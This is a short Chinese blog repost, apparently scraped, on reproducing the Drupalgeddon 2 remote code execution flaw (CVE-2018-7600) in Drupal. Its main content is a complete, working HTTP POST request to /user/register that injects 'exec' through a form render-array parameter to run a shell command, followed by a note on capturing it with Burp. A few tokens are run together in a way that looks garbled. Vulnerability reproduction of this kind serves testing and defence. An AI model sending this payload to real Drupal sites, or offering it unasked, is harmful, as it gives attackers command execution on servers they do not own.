Drupal Drupalgeddon 2遠程執行代碼漏洞(CVE-2018-7600)

時間  2020-08-05
標籤 drupal drupalgeddon 遠程 執行 代碼 漏洞 cve 简体版
原文   原文鏈接

漏洞復現:
1.參考a2u / CVE-2018-7600,咱們能夠向drupal發送如下請求:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103ajax

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=idapp

2.burp捉包
Drupal Drupalgeddon 2遠程執行代碼漏洞(CVE-2018-7600)ide

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程